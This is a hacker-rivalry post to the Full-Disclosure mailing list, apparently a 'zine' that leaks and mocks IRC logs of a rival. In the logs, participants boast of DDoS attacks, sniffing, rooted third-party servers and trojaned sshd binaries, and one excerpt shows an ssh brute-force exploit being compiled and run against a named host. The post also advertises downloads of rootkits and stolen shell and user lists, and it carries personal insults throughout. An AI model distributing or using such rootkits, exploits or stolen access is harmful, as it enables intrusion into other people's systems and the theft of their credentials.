<mailto:burnout () burnout bitchx org> PRIVMSG r47 :he's packeting me
<- :d0n_!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :;\
-> PRIVMSG d0n_ :d0n No such nick/channel
-> PRIVMSG d0n_ :d0n End of /WHOIS list.
-> PRIVMSG d0n_ :change
<- :d0n!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :lamer :(
<- :d0n!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :owns my dsl
<- :d0n!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :real leet
-> PRIVMSG d0n :who ?
<- :d0n!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :that d0n guy
<- :d0n!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :had my nick
<- :d0n!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :was talking shit
<- :d0n!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :"here comes the ddos" he said
-> PRIVMSG d0n :fuck
-> PRIVMSG d0n :lets hack him
-> PRIVMSG d0n :not hard target
-> PRIVMSG d0n :hehehe
-> PRIVMSG d0n :to me
<- :d0n!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :HHEHEHEEH\
-> PRIVMSG d0n ::>:>:>:>
-> PRIVMSG d0n :sup bitchx
-> PRIVMSG d0n ::>
<- :d0n!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 ::)
-> PRIVMSG d0n :bitchx bugged
-> PRIVMSG d0n :do u use it ?
<- :d0n!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :the client?
-> PRIVMSG d0n :yah
-> PRIVMSG d0n :0dayz
<- :d0n!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :no shit..
-> PRIVMSG d0n :eheh
*********************** run to the hillz he h4s b1tchx 0d4y
**********************
-> PRIVMSG d0n :i have windows on linux
(vmware) ->>>>>>>>>>>>>>>>>>>>> lies
-> PRIVMSG d0n :hjmm
-> PRIVMSG d0n :;>
<- :d0n!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :ah yeah
-> PRIVMSG d0n :omfg
<- :d0n!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :any more fun with efnet soon?
-> PRIVMSG d0n :im still drunked
-> PRIVMSG d0n :no more
<- :d0n!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :HEHE
-> PRIVMSG d0n :im stoped with x0x0x
<- :d0n!burnout () burnout bitchx org
<mailto:burnout () burnout bitchx org> PRIVMSG r47 :;p
-> PRIVMSG d0n :just sniffing idiots
now ->>>>>>>>>>>>>>>>>>>> so we are
*********************** /laugh time
********************************************
-> PRIVMSG accuser :nem
-> PRIVMSG accuser :nao me comunico mais com povo
br ->>>>>>>>>>>>>>>>>>>>
-> PRIVMSG accuser :nao eh meu nivel
-> PRIVMSG accuser :so alguns amigos
-> PRIVMSG accuser :nego roubo meu canal
ontem ->>>>>>>>>>>>>>>>>>>> some guyz stole my network baby
-> PRIVMSG accuser :recuperei
-> PRIVMSG accuser :e tomei o nick
deles ->>>>>>>>>>>>>>>>>>>> i ddosed them and got their nicks
-> PRIVMSG accuser :/w psys
-> PRIVMSG accuser :/w dtr
-> PRIVMSG accuser
:hehehe ->>>>>>>>>>>>>>>>>>>> now i feel gr8
<- :accuser!~psy@64.244.62.214 <mailto:psy@64.244.62.214> PRIVMSG
r47 :eu vi
<- :accuser!~psy@64.244.62.214 <mailto:psy@64.244.62.214> PRIVMSG
r47 :o psys tacando monte de bot
-> PRIVMSG accuser :comigo eh dificil um br
poder ->>>>>>>>>>>>>>>>>>>> HAHAHAHAHAHAHAHAAHHAHAHAHAHAHAHAHA (12x)
-> PRIVMSG accuser :hehehe
-> PRIVMSG accuser :eu
mando! ->>>>>>>>>>>>>>>>>>>> im THE guy!
-> PRIVMSG accuser :eu to mo fora de guerra cara
-> PRIVMSG accuser :mas parece q os caras me perseguem
-> PRIVMSG accuser :e sismam q sou
lamer ->>>>>>>>>>>>>>>>>>>> /me laughs
-> PRIVMSG accuser :rs
-> PRIVMSG sexybaby :itsme q_+T*/81_3|Z3g;
r47 ->>>>>>>>>>>>>>>>>>>> hiz botz, thanks for sharing
-> PRIVMSG sexybaby :op q_+T*/81_3|Z3g;
sexybaby on @#brasil @+#Sonya @#24/7 @+#prank @#unforgiven
@#serious @#xanax ->>>>>>>>>>>>>>>>>>>> 3h3h3h3
<- :KoaL4!h@216.75.56.186 <mailto:h@216.75.56.186> PRIVMSG r47 :c
vai me ajeita un trem que presta entum? ->>>>>>>>>>>>>>>>> gimm3 a b0x
-> PRIVMSG KoaL4 :cara
-> PRIVMSG KoaL4 :vou
-> PRIVMSG KoaL4 :mas nao me atrapalha
-> PRIVMSG KoaL4 :to aki programando
-> PRIVMSG KoaL4 :pra um cliente chato pra kct
<- :\g4br13l\!~ucvn () server3 erz univie ac at
<mailto:ucvn () server3 erz univie ac at> PRIVMSG r47 :ta
<- :\g4br13l\!~ucvn () server3 erz univie ac at
<mailto:ucvn () server3 erz univie ac at> PRIVMSG r47 :arrumando truta
<- :\g4br13l\!~ucvn () server3 erz univie ac at
<mailto:ucvn () server3 erz univie ac at> PRIVMSG r47 :com os cara da defland pq
<- :\g4br13l\!~ucvn () server3 erz univie ac at
<mailto:ucvn () server3 erz univie ac at> PRIVMSG r47 :?
-> PRIVMSG \g4br13l\ :falaram meu nome em vao
-> PRIVMSG \g4br13l\ :nao qro isso
-> PRIVMSG \g4br13l\ :so isso
<- :\g4br13l\!~ucvn () server3 erz univie ac at
<mailto:ucvn () server3 erz univie ac at> PRIVMSG r47 :r47
<- :\g4br13l\!~ucvn () server3 erz univie ac at
<mailto:ucvn () server3 erz univie ac at> PRIVMSG r47 :tu se esquenta
<- :\g4br13l\!~ucvn () server3 erz univie ac at
<mailto:ucvn () server3 erz univie ac at> PRIVMSG r47 :com bobagem
-> PRIVMSG \g4br13l\ :hehee
<- :\g4br13l\!~ucvn () server3 erz univie ac at
<mailto:ucvn () server3 erz univie ac at> PRIVMSG r47 :?
-> PRIVMSG \g4br13l\ :nao qro pivete
-> PRIVMSG \g4br13l\ :de merda
-> PRIVMSG \g4br13l\ :kiddie
-> PRIVMSG \g4br13l\ :falando de mim
-> PRIVMSG \g4br13l\ :pq qm
manda ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA
-> PRIVMSG \g4br13l\ :sou
eu ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA
-> PRIVMSG \g4br13l\ ::>
-> PRIVMSG \g4br13l\ :esse univie.ac.at <http://univie.ac.at> eh show
-> PRIVMSG \g4br13l\ :tenho a www la
-> PRIVMSG \g4br13l\ ::>
-> PRIVMSG \g4br13l\ :usam checkpoint firewall
one ----->>>>>>>>>>>>> what the fuck ?
-> PRIVMSG \g4br13l\ :tunnelling by
trace ----->>>>>>>>>>>>> ?!?1
-> PRIVMSG \g4br13l\ :mto dificil pacota-la
*********************** boyfriends are fighting - portuguese only,
sorry **********************
-> PRIVMSG #thc :skotch is gay
-> PRIVMSG skotch :eai vagabunda
-> PRIVMSG skotch :vai fica na putaria ateh qdo
-> PRIVMSG skotch :to cheio de novidades
-> PRIVMSG skotch :e para de me chamar de verme
-> PRIVMSG skotch :rs
<- ::skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :vai toma no meu do teu cuh rapa, n qro papo contigo e ve se para de fica mandando alerta no meu nextel -> gtfo
-> PRIVMSG skotch :ahahaha
-> PRIVMSG skotch :vc tem
certeza ->>>>>>>>> are you sure baby ?
-> PRIVMSG skotch :entao eh isso ?
-> PRIVMSG skotch :ja era ?:
-> PRIVMSG skotch :ja era ?
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :sim
-> PRIVMSG skotch :eu nao vou voltar aki denovo
-> PRIVMSG skotch :pra falar com vc
-> PRIVMSG skotch :ja era ?
-> PRIVMSG skotch
:CERTEZA? ->>>>>>>> are you sure we are breaking apart?????
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :alias quem ta oltando aki direto eh vc, eu to na minha faz tempo
-> PRIVMSG skotch :to na minha tb
-> PRIVMSG skotch :so acho
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :vc fala merda e dps quer voltar a tras
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :coisa de mlk
-> PRIVMSG skotch :filho
-> PRIVMSG skotch :eu so acho
-> PRIVMSG skotch :q eh besteira
-> PRIVMSG skotch :agente brigasr por isso
-> PRIVMSG skotch :so isso
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :mermao n eh a primeira vez
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :q tu da dessas
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :vem falando bosta
:skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :e dps vem se desculpando
-> PRIVMSG skotch :so joguei um verde
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :n so esses verme de merda
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :q paga pau pra vc
-> PRIVMSG skotch :nao vou fazer isso denovo
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :q aceita tudo q vc fala
-> PRIVMSG skotch :whatever
-> PRIVMSG skotch :nao falei q tu paga sapo pra mim
-> PRIVMSG skotch :tu tb
-> PRIVMSG skotch :eh cheio das noia q nem eu
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :tu soh mostro q n confia
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :axando q eu passo maq pra xscholler
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :aff
-> PRIVMSG skotch :porra
-> PRIVMSG skotch :tu some
-> PRIVMSG skotch :so joguei um verde
-> PRIVMSG skotch :se nao confiasse
-> PRIVMSG skotch :tu nao tinha
-> PRIVMSG skotch :tds minhas box
-> PRIVMSG skotch :TODAS
-> PRIVMSG skotch :fdp
-> PRIVMSG skotch :outra coisa
-> PRIVMSG skotch :descobri
-> PRIVMSG skotch :o klux
-> PRIVMSG skotch :tem root na importec ->>>>>>
klux has root in importec[their box] (you are right sir!)
-> PRIVMSG skotch :NAO USA MAIS ELA DE PONTE ->>>>>>
dont use it as bounce anymore! (kinda late)
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :n vem dessas q qdo mandei o skotch.txt tinha mta maq la q vc nem tinha ownado, q eu tinha ownado sozinho
-> PRIVMSG skotch :e varias box.. ele so troca o ssh binario
-> PRIVMSG skotch :pra sniffa
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :n to usando mais importec faz tempo
-> PRIVMSG skotch :fica ligeiro
-> PRIVMSG skotch :eu formatei ele
-> PRIVMSG skotch :deproposito
-> PRIVMSG skotch :ele veio no meu pvt
-> PRIVMSG skotch :colo uma pa de merda
-> PRIVMSG skotch :ele sabe da ig
-> PRIVMSG skotch :da locaweb
-> PRIVMSG skotch :da pop
-> PRIVMSG skotch :<skotch> n vem dessas q qdo mandei o skotch.txt
tinha mta maq la q vc nem tinha ownado, q eu tinha ownado sozinho
-> PRIVMSG skotch :e vice versa
-> PRIVMSG skotch :q seja
-> PRIVMSG skotch :ouytra coisa
-> PRIVMSG skotch :peguei coisa quente
-> PRIVMSG skotch :sshd
-> PRIVMSG skotch :hehehe
-> PRIVMSG skotch :remote expl
-> PRIVMSG skotch :openbsd local ->>>>>>>>>>
y0y0 juz g0t a openbsd local (right, check it on milw0rm, asshole)
-> PRIVMSG skotch :tu fica de putaria
-> PRIVMSG skotch :agente perdendo tempo
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :o openbsd vc a mando faz tempo
-> PRIVMSG skotch :mas esse novo nao
-> PRIVMSG skotch :entra na merda do msn
-> PRIVMSG skotch :e para de putaria
-> PRIVMSG skotch :por besteira
-> PRIVMSG skotch :vou te desblokear ->>>>>>>>>
i'll unblock ya from msn babe! plz come back !
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :to indo pro trampo
-> PRIVMSG skotch :vai para com a putaria de merda ?
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :quem fica de putaria eh vc, falando bosta sem saber de nada
-> PRIVMSG skotch : *
-> PRIVMSG skotch : * eXstacy ~ # gcc sshexploit.c -o sshex -lssh
-> PRIVMSG skotch : * eXstacy ~ # ./sshex -h laggy.org
<http://laggy.org> -l xxxxx -d keys/ ->>>>>>> w0w, this is certainly a 0day, right ? /me rolling on the floor laughing
-> PRIVMSG skotch : * [!] KEY FOUND!
-> PRIVMSG skotch : * [!] Logging in...
-> PRIVMSG skotch : * Last login: Fri Aug 15 16:05:43 2008 from
xxxxxxxxxxxxxxxxx
-> PRIVMSG skotch : * xxxxx@digitaljunk ~ $
-> PRIVMSG skotch : *
-> PRIVMSG skotch : * Not that practical since it doesnt use
threads, but the code shows
-> PRIVMSG skotch : * howto make a ssh client from scratch using
libssh for what purpose
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :procura se informar primeiro antes de falar merda
-> PRIVMSG skotch :so joguei verde
-> PRIVMSG skotch :sou noiado
-> PRIVMSG skotch :vc tb he
-> PRIVMSG skotch :normal
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :esse ai eh um bruteforce q usa um bug do ssh
-> PRIVMSG skotch :nao fiz mal nenhum pra vc
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :pode demorar horas pra achar a key certa
-> PRIVMSG skotch :nao
-> PRIVMSG skotch :de 5 a 10 min
-> PRIVMSG skotch :o coideloko ja ta melhorando ele
-> PRIVMSG skotch :pra demorar menos
-> PRIVMSG skotch :hehe
-> PRIVMSG skotch :a oi ta bugada
-> PRIVMSG skotch :ele FUNCIONA
-> PRIVMSG skotch :e jaja
-> PRIVMSG skotch :to com 0day pra samba
-> PRIVMSG skotch :aguarde
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :so falo
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :pra vc fica esperto
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :q tem gringo
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :te sniffando
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :pq fikei sabendo
-> PRIVMSG skotch :ta loko ?
-> PRIVMSG skotch :so se for na bnc
-> PRIVMSG skotch :hehehe
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :nego q ta falando com vc
-> PRIVMSG skotch :ateh entao nao ligo
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :soh pra causar intriga
-> PRIVMSG skotch :porra
-> PRIVMSG skotch :tu eh meu amigo ou nao eh :?
-> PRIVMSG skotch :<skotch> so falo
-> PRIVMSG skotch :<skotch> pra vc fica esperto
-> PRIVMSG skotch :<skotch> q tem gringo
-> PRIVMSG skotch :<skotch> te sniffando
-> PRIVMSG skotch :<skotch> pq fikei sabendo
-> PRIVMSG skotch :qm sniffando ?
-> PRIVMSG skotch :skotch
-> PRIVMSG skotch :fala krl
-> PRIVMSG skotch :skotch
-> PRIVMSG skotch :skotch
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :to comend mermao
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :e to atrasado pro trampo
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :flw
-> PRIVMSG skotch :cara
-> PRIVMSG skotch :se tu continuar folgado
-> PRIVMSG skotch :naovaidar
-> PRIVMSG skotch :vai sew fude
-> PRIVMSG skotch :fala direito
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :isso eh facil de vc descobrir, so vc ver quem se aproximo de vc
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :ultimamente
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :e n trocava ideia antes
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org
<mailto:skotch () d0nt bl4m3 4 l33tzor org> PRIVMSG r47 :so vc pensar
-> PRIVMSG skotch :whatever
-> PRIVMSG skotch :vc
-> PRIVMSG skotch :e o thomaz
-> PRIVMSG skotch :sao os unicos
-> PRIVMSG skotch :q tem as m erda q tenho
-> PRIVMSG skotch :UNICOS
-> PRIVMSG skotch :mais ngm tem
-> PRIVMSG skotch :nao confio em m ais NGM
-> PRIVMSG skotch :eu acho q tu deveria me falar qm eh
-> PRIVMSG skotch :so isso
-> PRIVMSG skotch :e troquei de bnc ontemrs
-> PRIVMSG skotch :e troquei de bnc ontem
rs ->>>>>> i changed my bnc yesterday! (we're glad)
-> PRIVMSG rip :skotch said to me that are sniffing me
-> PRIVMSG rip :but skotch dont know about
nothing ->>>>>> as always, backstabbing hiZ boyfriend(skotch)
/*
* Geminid IIb. TCP/UDP/ICMP Packet flooder
*
* What can i say? Enjoy! :)
* gr33tz: PoWerPr0 and godmode0
*
thanks for the gem source by the way!
>>> there could be more logs, but some kool guyz cant stop ddosing
r47, so this is kind of boring to do
>> anyway, if we get something else in the future, we will publish
again. thanks buddies.
> random logs if you have nothing to do:
http://labsec.elite.vc/r47-1.log http://labsec.elite.vc/r47-2.log
##########################################################################
# __ __ __
__ #
#.----.| |--.---.-.-----.| |_.-----.----. | |_|
|--.----.-----.-----.#
#| __|| | _ | _ || _| -__| _| | _| | _|
-__| -__|#
#|____||__|__|___._| __||____|_____|__| |____|__|__|__|
|_____|_____|#
#
|__| #
# #
# - download
links #
##########################################################################
<><> thiZ iZ ZeRIouZ buZInEzZ dewD!
<><> http://labsec.elite.vc/x0x0x-suckY-sshd.tar.bz2
<><> http://labsec.elite.vc/x0x0x-suckY-phalanx-suckit.tar.bz2
<><>
http://labsec.elite.vc/x0x0x-suckY-shells-ips-users-allinone.tar.bz2 [we are not sharing all of them, just some random ones]
<><> please guyZ, make it priv8 ! (/me rolleyes :B)
- kool&klean chapter.
##########################################################################
# _ _
___ #
# ___ | |_ ___ ___ _| |_ ___ _ _ | | '___ _ _ _
_ #
# / | '| . |<_> || . \ | | / ._>| '_> | |-/ . \| | ||
'_> #
# \_|_.|_|_|<___|| _/ |_| \___.|_| |_|
\___/`___||_| #
#
|_| #
# #
# -
conclusion #
##########################################################################
----------------- reflection time
>.......... whats the point of all this ? prove that you are better
than someone ?
>......... what a joke. just coz you are lucky and had the chance
it doesnt mean you are bl4ckh47.
>........ your zines are pathetic. what the fuck is this 'messages'
shit in the bottom of them ?
>....... like you are able to hack someone by yourself, eh ? you
cant do shit x0x0x, you ARE shit.
>...... why thank soldiers and all blackhats? you dont belong to
any of them, none of them like you.
>..... why would someone send you a mail? nobody cares about you,
dipshit.
>.... i cant really believe that you spent time creating a new mail
just koz of your second shit zine, hahahahaha what a joke
>... stop playing hacker, you are not hacker, - we are not hackers
-, you cant even do shellscript, get a life while you can.
>.. a kiss to zmda
>. think twice before you fuck with us, asshole. we know you, we
know what you can do, and we know what you cant do.
> just to finish:
******************************** m355 w17h 7h3 beZt - diE liKE th3
r3s7 ********************************
;
;
; _____ __ _______
;| |_.---.-.| |--.| __|.-----.----.
;| | _ || _ ||__ || -__| __|
;|_______|___._||_____||_______||_____|____|
;
; _______ __ __ __
;|_ _|.-----.--| |.--.--.-----.| |_.----.|__|.-----.-----.
; _| |_ | | _ || | |__ --|| _| _|| || -__|__ --|
;|_______||__|__|_____||_____|_____||____|__| |__||_____|_____|
; ;
;
; #LABSEC @ EFNET - closed to friends, of course.
;
; klux/djow - include - input - r3n4t0 - memelo - deadcow - w3b -
kernel` - kylebond - fseek
;
; lAmE ZiNE wRitTeN bY:
;
; klux - spoof1 @RR0B@ gmail.com <http://gmail.com> - hAppY flOodiNg
;
;
; wE iZ watCHiNg U
******************************** m355 w17h 7h3 beZt - diE liKE th3
r3s7 ********************************
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
----------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Lame... _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- x0x0x? its a joke! bussinessinbox box (Aug 31)
- Re: x0x0x? its a joke! Robert Holgstad (Aug 31)
- Re: x0x0x? its a joke! Thedjatclubrock (Aug 31)
- Re: x0x0x? its a joke! Robert Holgstad (Aug 31)